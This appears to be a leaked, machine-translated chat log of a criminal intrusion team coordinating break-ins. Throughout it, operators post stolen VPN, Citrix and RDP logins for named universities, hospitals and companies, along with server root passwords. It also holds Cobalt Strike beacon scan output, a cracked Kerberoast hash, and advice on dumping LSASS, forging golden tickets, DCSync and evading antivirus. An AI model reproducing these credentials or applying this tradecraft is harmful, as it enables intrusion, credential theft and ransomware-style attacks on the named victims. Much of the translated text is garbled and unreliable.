``Don't run cmd, powerShell, taskmgr everything is mocked up admin then you are the quietest in the job and why do you need a replacement writeLf you need anything else?
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234
```
@user9 replacementdavaynetwebuy I can give you more access, it may work faster there than here
```
beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024
[*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]

[+] received output:
172.0.0.188:443
172.0.0.187:443

[+] received output:
Scanner module is complete
``Check Web Ports'' somewhere in the vicinity
beacon> portscan 172.0.0.1/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
```:ok_hand:at 24 scan for DNS sabnetupo put scan /16 of your ip is on the interface check ipconfigda alive it seems to have fallen offavpn alive? and ping does not pass to the ip that ip scanner gave[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) does not work to move anywhere
napn streaked but in the subnet 172.169.16.1-172.169.17.254 portskan does not give anything took the firewall in their hands and blocked, okzablochal rdp connect why is it? kaspersky nailed itawn your addicts second so he probably and blocked the entrance[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) yes, Citkrix will not let without edr and windef was a palsy turn on) created[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) there's a session did you have kasper on the hard disk? OK, I'll rewrite it[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) no, it was a text file. os, what did you do, what you got, what was expected, what's the problem and now I took off the toolchain before I got thrown out - I took off by hand - if your hands - this archive? so I do not understand, you took it off by hand or through toolchain? i did not finish downloading - more than 200 meters file was `` ``
https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207!
```
@user8 replacement from tulchain adf returned 11 users and how many without tulchain? maybe it's okay? or maybe it's a bug? from tulchain - it returned 11 users in adfind, and I downloaded the file 238 MB there is nothing at all?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) there is only one application and these creed him not catalyze more, take hell, take the access and get into the network who does that) creed citr....and the record of persist from the registry disappearednu I put on my coba persist where did you get dll to fix? ummy everything disappeared, even dll to fix there is nothing there av or something? strange in the appdata from the usera where you left them? there is strange.... i just re-logged through cirta, re-session to myself, and no my files there already ... how so? burned by the demons? ah, good come back i already.then he had already hell info take away someone @user4 in the net so well, you now have 3 dedicates and wpn not turn off even after reboot most likely flew a dedicate for wpn means from portal with flashy config) well go to the link he himself offered to download from the portal?installed from where? there only citra installed and all, not even configured it put vpn? i and user 9 on it worked ddik not connect to what is it? who last worked at 199.241.188.186?
https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com blue4586
```
@user8 replaced ad infosisd@user4 from where? @user8 beep me in the confu I had a session failed (progress described in the confu@user9 @user7 in work what other 3 people are busy? and you're an admin? ok, now add a user group burned anomaly and removed the remote access group `the connection was denied because the user account is not authorized for remote login ``
what do you mean not authorized for remote login ?who has the ipn up / have access to the network ? did not understand the question who else ? @user9 at worklsadmiki some sites.i have one, from citrix can not go anywhere
iphone is up and running on a new computer - i'll try to see what's on the net under ipnomtoolchain for tests1 how many networks are up and running?
FH*(UG&$*WFHWH&*efu
``What to do next? What's the plan? You mean the citrix receiver?
I also kinda connected, but then the ddik went away@user9 and what's your problem? I connected to vpnuwin 2012``
206.221.176.24:37345
Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY
hotswapdate.com not yet available in the daedic is it still not fixed? the same situation I can not run cmd and powerShell is closed by the admin, the file does not fill up.what's your confab? then the lpe and so on)) if you forget: AD INFO, LA, DA, EA, DCnet, all according to the algorithm i'm in the system, then as usual? or some other inputs? i do not understand the question, we develop the whole grid, i mean AD to shoot? and while the daemon is still not available i am still logged in, i just a little do not understand
everything there, in this link, leads to the sites[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) are you logged in? or a user?
https://connect.mch1.org/vpn/index.html lpsmpep2 vk2lazu4
```
@user8 replacementdescribe in confutacci@user8 where are we? ok, he'll reboot and bring him to the cobb just in case he went for a vpn taqi so weno after start I worked in it 10 minutes moreplugin citrixa haven't you run a vpn on it by chance?) yes, a few minutes he will work and then 15 is not availablepohodu diddik completely died (199.241.188.186) ```
https://mydesktop.sisd.net/vpn/index.html jeksae happiness3
```
@user4 change the citrix receiver something like a pass-through
but it's not going online? [ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) the dedicator is falling off, but
I've been there - everything leads to the admin sites
JE*SG&Y*FwEYHIf7g8we
JE*SG&YY*wEYFEYffggWe ##+Dadokin? but there's a detection rate higher there's a variant of crypta shellcode in the shellcode in the dllnea?
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com thebear#1
```
@user9 replacement@user3 replacement ```
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
Pass the dedik @user8 in the meantime, the user is logged in and then the user disappears from the list.
your changes could not be served due to an invalid configuration of the account PROD
ica file is a file that citrix receiver opens and you have to put citrix receiver which will open this file.
[Encoding]
InputEncoding=UTF8

[WFClient].
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=Local
TransportReconnectEnabled=Off
Version=2
VirtualCOMPortEmulation=On

[ApplicationServers]
Report Request Maintenance Prod=

[Report Request Maintenance Prod]
Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPSecurityTicket=On
ClearPassword=53F80104235331
ClientAudio=On
DesiredColor=8
DesiredHRES=0
DesiredVRES=0
Domain=\6AA387C7B8517C82
DoNotUseDefaultCSL=On
EncryptionLevelSession=EncRC5-128
FontSmoothingType=0
HDXoverUDP=Off
HTTPBrowserAddress=!
InitialProgram=#Report Request Maintenance Prod
Launcher=WI
LaunchReference=558DD381B14D807B6BEEDE6BACFB10
LocHttpBrowserAddress=!
LogonTicket=53F801042353316AA387C7B8517C82
LogonTicketType=CTXS1
LongCommandLine=
LPWD=156
NRWD=93
ProxyTimeout=30000
ProxyType=Auto
SecureChannelProtocol=Detect
SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb
SFRAllowed=Off
SSLCiphers=all
SSLEnable=On
SSLProxyHost=ag2.cernerworks.com:443
startSCD=1606819909507
Title=Report Request Maintenance Prod
TransportDriver=TCP/IP
TRWD=0
TWIMode=On
WinStationDriver=ICA 3.0

[Compress].
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll

[EncRC5-0].
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll

[EncRC5-128].
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll

[EncRC5-40].
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll

[EncRC5-56].
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll


``All kerbs to @tl2a, all)``or does medimizer refer to user4?
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``Yes, I then changed the message to medimizerthere were just 2 accounts@user9 you took access from @user4 he has the domain ``mysystems4pt.com```https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!``[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +```
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``Zabrad https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773``
https://portal.mysystems4pt.com/vpn/index.html PWilliams061
Create a confab, add you sort and write who took what accesses are valid 5 pieces``.
https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773
``````
https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87
``And there will also be rdp``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``````
https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent
``````
https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!
``Don't you remember how it's done?'') dismantle and get to work you have 2 ddisks to work with vpn + citras from the scale of work, I give you a list of citras + vpn + citras, while will be in stockDo not, just no one needs it, all are gone, someone wants another new coba?
spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf
If the koba does not connect to the koba then it is inaktiv right?i have 2 inactive3 koba means workingkhaip domain with parentheses in googledav query as you wrote, with parentheses23.106.160.86 no information no domain atypip domain or ip koba checked?i have two clean cb's if there is info that ip marked as cb's then cb's in the snow search 123[.]123[.123[ ]123zasvilischestvennym as koba strike at whom koba active check the domain ip in google on detektovydam fresh yescryptor there? activesimvp.com somebody one did not sign off on koba) the rest did not have a koba?
likenic.com
104.243.40.126:38542
```
not active me ``85.150.190.113:61718`` active (it's from the last one they gave)`` the others?
```
https://ezvol.com
-
209.222.101.55:38350
Sessions from labs arrivetulkit will be closer to 15:00 fresh build, it will be given out @tl2, sootv from all of us feedback on the workrallss.com active/not activeskat me your old kobytes what about the tool kit and on kobami, in terms of work in the old or new will be?min 10 for org questions and then work directlyWell, hello again everyone, it's been a long time since we talked to you all 5) 5) 4 in total? all in place and start)Good day:space_invader:hello\Well, good daynix vpski
```
192.169.6.100
u: root
p: DG8mZZyB
---
192.52.167.104
u: root
p: PeEDMf5q
```
``Friends, I have no power at all, I'm leaving for segonday, if you get to raise any other network in addition to the one that raised to the correct rights - and will have strength - get to the domain controller and put in a slip for 180 a couple of three server sessions would be good aha)aha, it would be good)))) aha
autopavnunu you give) drive machines in a bunch - where the rights fit - there will be removed lsaas and spit in the console, and I've already dreamed ... (or with each hand dump lsaasn each simply you do not need to create a session itself it only works for those machines where you have the admin Credits yes more here .... oh....... look at the screenshot it's probably pointless, because on the car yes he is not an admin or anything.
this isn't serious.
i am not a translator of the obvious articles all the same `[<domain>/]<user>[:<password>]@<target>> what should i specify here?)↪Psassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target> what? what do you mean?)That is, run without specifying credentials with a target on the car where sits YES? they just go to the availableNo, of course only I have local admins and where Yes sit they are not admins. This will work? Yeah, let me try) @user4 to your problem, by the way, fits perfectly, it's someone who has a lot of cars with admin rights but no usernames needed http://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/:thumbsup:will be to understand the new tool and method[ ] (https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?everyone will have to read and get into it at least there will be a process update will we? can we finish with the current tasks and move smoothly to #sisd-petneav ptsh no way to run sharp files from memory? i build you under x64 dll+all build with x64 check?let's give you the silkod fileDelki stalenea no cobalt new? was the cleanest of the lastllvm I can buildCryptor is clean? there will be a meeting in half an hour and we'll discuss everything we'll start closing in an hour[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) cheto silent dept(ok, I'll try it now? probably will take 3-4 kobu dept gather loads of clean for each personal kobu with a build?[ ](https://mediaeveryone.com/channel/general?msg=poH4tpKdX3YgrcJoR) took[ ](https://mediaeveryone.com/channel/general?msg=myX45efB6jTFRGsgG) ``
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!!!

```
@user7```
https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219

```
@user3 check, you had it in the works```
https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074!

```
Is @user8 still available to replace ?@tl1 is there anything else? Your credentials are invalid. Try again or contact your system administrator.
https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears
```
@user3 replacement, so it's clean ```.
Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist.
``Yes, fine-tuning the computer, if you get an error after running the above command, you can check the default path manually
```
dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine
So you're out of a job? And once again, I gave you a report on each of the two you gave me. One in the confab and the other in general. In one of the data is jammed, the second can not run cmd ``.
Get-PSReadLineOption
```
last time, write down the accesses are dead and the network is dead?
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx

```
I have this network open on you, did you write to #general or to the confab? okReinstalling the OS on your computer. You blacked out and didn't see the partitions in #general? So what have you been doing? I've been texting you on every single one.
https://paloca.cernerworks.com/citrix/prodweb/

``````
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx

``````
https://paloca.cernerworks.com/citrix/prodweb/

``Yesterday with everyone on the networks, what's in work[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) What? [ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) What do you mean yesterday missed? All died? What are you doing? I have 2 networks on you, I created you yesterday missed? Are you kidding, man? I wrote to you yesterday that the data is blockedpotomo created a hell of a conf[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) work you wrote back ok, you have progress on the grid or what? in trete look all there is a session domain `stg-healthcare.com` From where? @tl1 On what? @user3 not yet answered my question to me understand[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) ask about the loadNow if I think about it logically from your suggestion about the load how can I know about it? How do I know that @user3 is working with tpsh>I refer you to @user3 he works with tpsh>and you are in one place in this forum already met the information about this I do not know that someone else in tpsh could give me the load?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) i already answered in #general all sit there 2 people besides me had access therewas 5 people in one place[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) m? and got nothing i posted about it yesterday and i see that you chose to wait 4 hours ask your colleagues coba pulled or la/da got? i had a choice? 4 hours of what? just sat for 4 hours? i waited for it yesterday @user8 what have you been doing the last 4 hours? waiting for the load? we could not press 2 buttons and give the load to a colleague? me and @user8 ?how many people in the team? what more accurate? > i need a team to spawn in tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) that is the team in tpsh can?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) more accurate? i had the same as i wrote in the chat
roth trying to make portfwd does not want to workNormalized build alreadya command to tpsh can? how are you doing?:v:no thanksZe8ZW53FztpsVFTuser3a password can not rememberwhat - what? his, he moved the system, what login?@tl1 stalin in the rocket can not authorize, throw the password will be todaybuild? and the rocket was lying and could not go in any way rdp, because access in the rocket is lying for tpslichno i command wait for what? wait for what?
i need a command to spawn in tpsh for the grid `tcph.stg-healthcare.com` what are you doing now?org - conf conf conf to plz @user3 vpn in work, you can to it+dav meaning to help? to support)[ ](https://mediaeveryone.com/channel/general?msg=M3Wiw2qsSajQRKZ29) it where? if today will update configs on vpn, i will give in work go to sapuga(went home aunty, apparently....+ disassembled? update injectorobnovnosti disassembleDa new koba? i1 people needdobavliv in chats in `CORPSFECRT04` if availablekrch, if vpn enabled immediately jump to `CORPKIOVDAPGM01` putilkydayut silkodelevisa flew[ ](https://mediaeveryone.com/channel/general?msg=8oQfYvwK867aCbLo3) lunch lingering I raced to the drugstore).
after delivery so to speak, right behind the activated charcoal here came to work, had lunch and went home) lunch... everyone left sharply) yeah fuck) @user7 go smoke alone here)) then @user7 give the silk code[ ](https://mediaeveryone.com/channel/general?msg=qn5jrsA9jZxjAvG76) before the store probably give 1 kobe to replace the long? it came out@user9 you only kobe died yesterday? i already filthy kopech... i think only voodoo what kobe participated yesterday in the lok?give silkoda later will be? so far nothing to give out additional (all past (re-run all past? do through the old design now the whole list and I'll write back to youxactly some +@user7 also vpn@user3 will give vpn for work so, we have 2 people without a job?i will also put invey, but i have not decided where i will try to determine who the admin is, so i can determine whether they outsource or neta what is in sccy besides monitoring? in sccy user4, there is also monitoring
i'm only in sccy what are the rest of them doing? @user9 in snu and sssutak about todaya don't remember there at all whining
I'm gonna check the splotches? Yeah, I've checked them all.
no vulnerabilities
ms17, net_api, smbghost, rdp exploits, snu.edu what's left to check?
i have one session from there, no dk, nothing is pinged there vpn snu.edusccy of the activeWhat? i have a vpn written out for you, but i do not see any information about itAnd i have a few questions for youdavay))) how to get a coffee minimum what current tasks? i do not understand you do not work?) i think on the roada where all?HiThen I do not understand what the problem is not countinglab / dedik? We do not have a winnda? It's a winnda and https://github.com/quasar/Quasarтак, then take it for a test))) Tool kit tested)) No. Nets what were / are? On what @tl1Hi what tasks? ptHiTo do not have a job? ┌─[input0 @parrot]─[~]
└──╼ $ping helpdocpt.club
PING helpdocpt.club (162.0.237.18) 56(84) bytes of data.
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 ms:thumbsup:you will find YES we are going to move on there in the next couple of hours+while we are working with the matches+We will continue in half an hour+what time is it? an hour? rather yes than no)snacks)we were not told about lunches in these two days so, do you have lunch?you take hash krbtgt and make yourself a ticket for any MA and you're on a roll)H time passed, maybe even the next day, and all MA have changed passwords, dumps hashes from dx are taken from that including from MA2) it allows you to make a token from any user)) 1) if you get hash from krbtgt, I've never seen a case where you have a hash file from krbtgt somewhere on the disk (don't read it).txt` is also a good question if we got the hash of the krbtgt user
we can do a golden ticket, what can we do with it? just like with ntlm hashes, you throw in a conf - you get the pass once you get the pass immediately passed to you
emeralmatherials.com
```
here's the keb
```
$EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012
``Because too serious pass and brute-force does not take) here are the domains in the archive lie, we took kerberos, but finished without it came out, it's all about non-identity, okay. Sitauatsiya, there is only kerberos hash, what to do with it? Where do I knock? A better question, a counter question, what is the point of getting kerberos hashes if we have never used them? Do you have no help for modules? Yes, knowledge about vectors and what you can and cannot give you useful modules, your task is to study them, document, check and use in practice, you should do this task in another, I can write everything about each module if you do not study the modules they give, what is the point?https://cisoclub.ru/kerberoasting/может you and tell us? more details, what kind of hashes, where from, whose, how they are there, why they are not the same everywhere, etc. gives some output to the console can also write "gives some output to the console") collects hashes from memory, as well as everything else, in principle, just for the record, how does invoke-kerberoast work?and another thing, the better you know how the network works together with Active Directory, the better understanding of what can be done in it we give you only the basics, to show that you can do this, but not always necessary, the better you think in the context of the task in the whole vector so the more you train to do the yuak bypass, look for their own modules for the tasks on the git, read guides, etc. as well as everything else in fact, this can only be cured by experience) inattention you sometimes 3-6 times in the hope that something will change you do not read the findings teams then can add more tools to our arsinal at lunch time? let's sit and do some research at lunchtime[ ](https://mediaeveryone.com/channel/general?msg=HY3ZumpXaCbLmxJPw) from what I've seen[ ](https://mediaeveryone.com/channel/general?msg=QTfEBz7jkqkEardwe) even to give an example, in some zelda you can't pass a riddle, you look at the youtube walkthrough and you're already advanced
just here with the analysis, listen to reasoning, some chips from the "stuffed hand" tackle and then we'll take apart the new materialafter lunch more questions for a couple of hoursmaybe while you go to lunch did not negotiate you lunch an hour off? or you go?[ ](https://mediaeveryone.com/channel/general?msg=WKA2Jom9LuADmvBea) the same rebuilding modules based on the starting environment, just will be faster because the hand is stuffed)2-5) first search for the same command on the same git in c# .net application, then third-party modules that can be imported and as a last resort - download the module to your own dedicata, take the source file and moved by hand into the folder of modules on the target machine - perform the necessary actions - clean up after themselves it is clear, just incredibly interesting to look at the passage of at least one network directly in the field with reasoning, and not like everyone on the Internet in their lab without a hitch2-3) build your own exe version and run the same questions?because you didn't go further than PE, but today we will[ ](https://mediaeveryone.com/channel/general?msg=5sWj3jXdCZqfa2LGg) already on the lp there may be differences at the stage of UAC for example, at the stage of domain disconnection in the EA context so no experience at all.By the way, yes, it would indeed be extremely interesting to see how someone more professional than us works.Not identical sessions, identical actions * understandably not identical, but the algorithm in different contexts is approximately the same
low priv - collect what's available
LA/System - mimic and other more serious things
DA - we haven't used anything but dcsync
Just for the contexts, actions are essentially identical, maybe we are not working as it should, and maybe it is so it's understandable that situations are different and allWe are not just expanding the arsenal, methods, structuringsomewhere you drop AV for 5 minutes of any activity, etc.somewhere nothing of the modules will not work at allwhere you can unroot kerberoast in 10 minutes You understand that the sessions are far from identical Yes, from the appearance of the session to the DC where are 2 users still?the question at the level of "what if Stalin was alive now", for example, raising privileges for the average life of one session from 1 minute to 4 hours?well once from the side to see what to do after the first session?) the order of what?) well the order of what actions? will there be a "master class" with a description of actions ?[ ](https://mediaeveryone.com/channel/general?msg=guBDpNRBxZXHDQioL) do not know what to describe here - what is required in the user context or tied to it (browsers, winscp, putty etc.) do from the user context, what requires system rights (hashdump, logonpassword) from the system[ ](https://mediaeveryone.com/channel/general?msg=u8SJcuXGnrkeCtBXb) please answer the question you may have when you have tried everything [ ](https://mediaeveryone.com/channel/general?msg=2JB9BEAgsYLjYY8Ae) I never used it but it should be in your arsenal anyway because it could be the last vulnerability to raise your rights) you have a mindmap and you can go to any point you want [ ](https://mediaeveryone.com/channel/general?msg=XTmBDzwfkSKsKXJHh) it depends on the problem. if your session crashes - you see what AV, if you need to get on the target machine - idletime, the maximum useful information is passwords and hashes, because you will at least have a dictionary for the brute force, at most you will have a dictionary for the brute force attack, and at most you will have a system to try to reach other hashes/passwords. The point is you can't hashdump without a rights system, right?passwords, hashes, that's why I asked the question, what to look for in winpis a lot of information about elevating privileges via dllhijack - how often is this technique used in real life? does it make sense to mess around with it?
  Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com
  UserName :
  Password : Canada!75
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 1/21/2020 9:16:27 AM
``Skip open your seatbelt on gpj of course)``I never found passwords in winPEAS and seatbelt. These questions are answered by the modules above-the question is where they are and how to get them-the maximum usefulness - passwordswhat did I get out of them for chat, what was useful and what was worth getting out, what was not worth getting out-I mean besides there list of balls, AV and other stuff, what will be useful to get out?it's all by category and there's a link to the site with a description
```
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
``````
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
``[ ](https://mediaeveryone.com/channel/general?msg=QgGf843gNp4ZJSSBb) as an option idletime to check when was the last user activity before you enter by rp2-1) got an error - google it, in time you will learn popular errors (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon)
2-2) on passwords and "interesting" files that may contain passwords. you can also look for internal portals that may be vulnerable (ala sql injection), which will allow you to open a session already on the server
2-3) don't understand the question.
2-4) let's leave the question for now.
2-5) don't understand the question.
2-6) koba itself adds this information when you scan through portscan hosts and koba sees the OS, it will automatically add it to the Targets, the command adds a Hashdump hashes, etc., Type in addition to the default AdFInd and other collectors, what you can in low priv yute? can shed on which tools are best used in what contexts pro 2-2 support, maybe in `group ` instead of `all ` makes sense to specify something else in some cases?

The same about winPEAS, the conclusion is gigantic, but what is the most useful to pull out? first questions on the already existing knowledge and experience, then how to understand `disassemble the network`?VladislavHolding said in the video that we were not taught how to parse the network, which tools are better to use and in what cases (at least a couple for a more detailed study of them) about 1, I can assume the way you work, that you do not return the original context after creating tokens. And the modules require requests to the `psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process` 1) This is taken from PowerView via psinject :^), but the point is that it popped up with both Invoke-Kerberoast and SMBAutoBruteThis release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command.

I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process1) what module?
2) All possibilities are on the git info page, where you can find the help)
3) psinject is running psh code in a different process, this prevents you from killing the session if psh code execution is detected in the system
4) don't know, never used this argument)
5) `execute-assembly /SharpChrome.exe logins /showall` 1. This error:

```
ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:
```
What's the problem with this one? How do I get around it? What does it mean?


2. "rubeus is a more serious tool ;-)"
What other features does it have besides asreproast and kerberoast?

3. What is the main difference between powerpick and psinject, if you say that the latter is better than the former,
but the former worked yesterday in powerView, unlike the latter?

4. What is the meaning of ` /privileges:enable` argument at `wmic` if specifying LA/DA credentials?

5. How to work with SharpChrome, not SharpWeb, but Chrome. He does not have the most understandable help, how many attempts have not been - in vain so what? 20 minutes to prepare a list the first hour we will deal with general questions about the software, vectors, etc.hi:space_invader:Good morningGood morning, waiting for that, this week we will get and sessions and a new tool.sha on sessions ?all good day )+add everyone to expFederal.com
I can't do anything with this lab.
https://cloudgw.cpcc.edu/vpn/index.html
```
 and what's up with that?)Sure you're with them? I don't see a confab I'll create expFederal.com = hobbes?
Do you need a confab for that?
\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-HD001.Hobbes.loc\C$ - Default share
\USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-HD001.Hobbes.loc\print$ - Printer Drivers
\USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-APG003.Hobbes.loc\C$ - Default share
\USCHI-APG003.Hobbes.loc\E$ - Default share
\USCHI-APG003.Hobbes.loc\F$ - Default share
\USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC
\PCHIVH001.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIVH001.Hobbes.loc\C$ - Default share
\\{\PCHIVH001.Hobbes.loc\E$ - Default share
\PCHIVH001.Hobbes.loc\IPC$ - Remote IPC
\PCHIVH001.Hobbes.loc\V$ - Default share
\PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIAPG015.Hobbes.loc\C$ - Default share
\PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MAXP001.Hobbes.loc\C$ - Default share
\USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MAXP001.Hobbes.loc\M$ - Default share
\USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers
\USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-LT002.Hobbes.loc\C$ - Default share
\USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NET005.Hobbes.loc\C$ - Default share
\USCHI-NET005.Hobbes.loc\E$ - Default share
\USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET005.Hobbes.loc\print$ - Printer Drivers
\PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIFSP001.Hobbes.loc\Apps
\\PCHIFSP001.Hobbes.loc\ARCH -
\PCHIFSP001.Hobbes.loc\C$ - Default share
\\PCHIFSP001.Hobbes.loc\Cad -
\\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles
\PCHIFSP001.Hobbes.loc\CIVIL -
\\PCHIFSP001.Hobbes.loc\COMM -
\PCHIFSP001.Hobbes.loc\COMP -
\PCHIFSP001.Hobbes.loc\CONST -
\\PCHIFSP001.Hobbes.loc\D$ - Default share
\\PCHIFSP001.Hobbes.loc\ELEC -
\\PCHIFSP001.Hobbes.loc\EXEC -
\\PCHIFSP001.Hobbes.loc\F$ - Default share
